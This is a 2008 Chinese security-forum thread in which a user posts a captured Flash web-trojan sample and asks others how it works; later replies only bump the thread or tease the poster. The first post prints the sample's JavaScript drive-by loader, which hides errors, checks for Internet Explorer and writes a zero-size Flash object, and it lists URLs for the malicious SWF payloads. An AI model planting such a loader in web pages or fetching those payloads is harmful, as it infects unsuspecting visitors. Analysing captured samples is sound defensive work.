首页
社区
课程
招聘
[讨论]一个奇怪的FLASH网马,有别与12个文件那种
2008-10-21 21:34 2975

[讨论]一个奇怪的FLASH网马,有别与12个文件那种

2008-10-21 21:34
2975
无意中得到一个FLASH网马样本,swf解密后只有ly20088.asp?不多的明码,没搞清楚这个网马是怎么实现的。查了下资料,有个牛人也分析过,是一种合法SWF套用非法的SWF文件,可是当时他手上没有样本,就没继续分析下去。请问各位有什么看法?
代码如下:
<script>
document.writeln("<script>function init(){window.status=\"\";}window.onload = init;");
document.writeln("window.onerror=function(){return true;}");
document.writeln("");
document.writeln("if(navigator.userAgent.toLowerCase().indexOf(\"msie\")>0)");
document.writeln("{");
document.writeln("document.write(\'<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=4,0,19,0\" width=\"0\" height=\"0\" align=\"middle\">\');");
document.writeln("document.write(\'<param name=\"allowScriptAccess\" value=\"sameDomain\"\/>\');");
document.writeln("document.write(\'<param name=\"movie\" value=\"ifff.swf\"\/>\');");
document.writeln("document.write(\'<param name=\"quality\" value=\"high\"\/>\');");
document.writeln("document.write(\'<param name=\"bgcolor\" value=\"#ffffff\"\/>\');");
document.writeln("document.write(\'<embed src=\"ifff.swf\"\/>\');");
document.writeln("document.write(\'<\/object>\');");
document.writeln("}");
document.writeln("else{document.write(\'<EMBED src=\"ffff.swf\" width=0 height=0>\');}");
document.writeln("<\/script>")
</script>
swf下载地址:http://usa.ccxtt.com/ifff.swf http://usa.ccxtt.com/ffff.swf

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

收藏
点赞0
打赏
分享
最新回复 (3)
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
dlnkankan 2008-10-21 22:41
2
0
自己顶下吧。类似的问题,看雪的兄弟都没兴趣吗?
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
dlnkankan 2008-10-22 14:32
3
0
没有人愿意分析下吗?
雪    币: 255
活跃值: (207)
能力值: ( LV9,RANK:250 )
在线值:
发帖
回帖
粉丝
peaceclub 6 2008-10-22 19:49
4
0
【讨论】【讨论】【原创】【讨论】.....
看你的标题都能精神错乱了。
游客
登录 | 注册 方可回帖
返回